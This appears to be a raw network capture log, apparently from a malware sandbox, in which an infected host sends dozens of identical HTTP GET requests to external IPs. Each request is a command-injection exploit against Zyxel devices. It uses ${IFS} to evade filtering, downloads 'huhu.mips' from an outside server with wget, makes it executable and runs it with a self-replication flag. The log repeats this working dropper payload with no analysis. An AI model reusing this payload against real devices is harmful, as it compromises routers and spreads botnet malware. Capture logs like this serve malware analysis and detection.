                                                Jan 29, 2024 07:07:29.967921019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                715192.168.2.2353588161.57.96.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:31.000591993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                716192.168.2.2336358126.142.209.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:31.000627995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                717192.168.2.2333990113.106.128.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:31.000660896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                718192.168.2.234142492.171.101.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:31.000713110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                719192.168.2.234544069.141.59.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:31.000782967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                720192.168.2.235917274.38.39.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.004899025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                721192.168.2.233867065.17.219.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.004933119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                722192.168.2.235412620.209.69.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.004966974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                723192.168.2.2354008142.83.64.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.005017042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                724192.168.2.2358104174.229.206.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.005052090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                725192.168.2.235692012.92.74.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.005100965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                726192.168.2.234782017.76.42.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.005119085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                727192.168.2.234712887.242.40.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.005165100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                728192.168.2.2349470190.76.240.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:32.005300045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                729192.168.2.2348880106.205.104.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009030104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                730192.168.2.233434072.135.78.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009089947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                731192.168.2.23361828.34.131.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009114027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                732192.168.2.235183646.0.114.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009159088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                733192.168.2.23361381.155.19.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009217024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                734192.168.2.2357758157.32.251.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009249926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                735192.168.2.2347944111.142.83.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009352922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                736192.168.2.2357452168.230.81.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:33.009419918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                737192.168.2.2349832194.11.104.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017729044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                738192.168.2.2346172166.227.110.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017749071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                739192.168.2.2344214141.13.9.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017798901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                740192.168.2.2339252147.83.31.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017846107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                741192.168.2.2344966207.87.80.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017900944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                742192.168.2.235146863.111.154.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017918110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                743192.168.2.234199693.102.134.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017965078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                744192.168.2.234127854.209.40.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.017999887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                745192.168.2.2335674216.171.59.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018042088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                746192.168.2.235052670.47.112.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018089056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                747192.168.2.235646683.213.208.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018136024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                748192.168.2.2338934122.89.167.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018172979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                749192.168.2.2334922186.33.170.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018204927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                750192.168.2.235979831.238.211.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018239975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                751192.168.2.236026824.87.5.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018297911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                752192.168.2.234962657.90.217.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018323898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                753192.168.2.2355420153.180.139.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018376112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                754192.168.2.234543640.20.95.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018405914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                755192.168.2.2349270126.201.183.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018440008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                756192.168.2.2343578184.36.162.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018460035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                757192.168.2.2355426202.10.213.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018493891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                758192.168.2.2359250134.39.40.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018529892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                759192.168.2.233541296.92.28.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018584967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                760192.168.2.235240449.103.151.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018635035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                761192.168.2.234005269.113.79.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018663883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                762192.168.2.2358958152.196.49.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018722057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                763192.168.2.23399588.142.200.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018752098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                764192.168.2.2355624118.220.51.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018786907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                765192.168.2.2349584159.225.154.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018841028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                766192.168.2.233496252.79.246.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018878937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                767192.168.2.235176896.186.169.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018894911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                768192.168.2.2358292101.83.165.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.018944979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                769192.168.2.234236279.66.37.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019011974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                770192.168.2.2351062213.150.105.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019047976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                771192.168.2.2359184134.0.169.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019093990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                772192.168.2.2335800192.147.32.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019128084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                773192.168.2.2334382167.171.206.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019156933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                774192.168.2.2360186143.55.222.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019218922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                775192.168.2.2341308135.41.2.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019256115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                776192.168.2.2338766148.13.66.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019283056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                777192.168.2.2342790181.27.42.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.019329071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                778192.168.2.2339846179.96.103.250443
                                                TimestampBytes transferredDirectionData
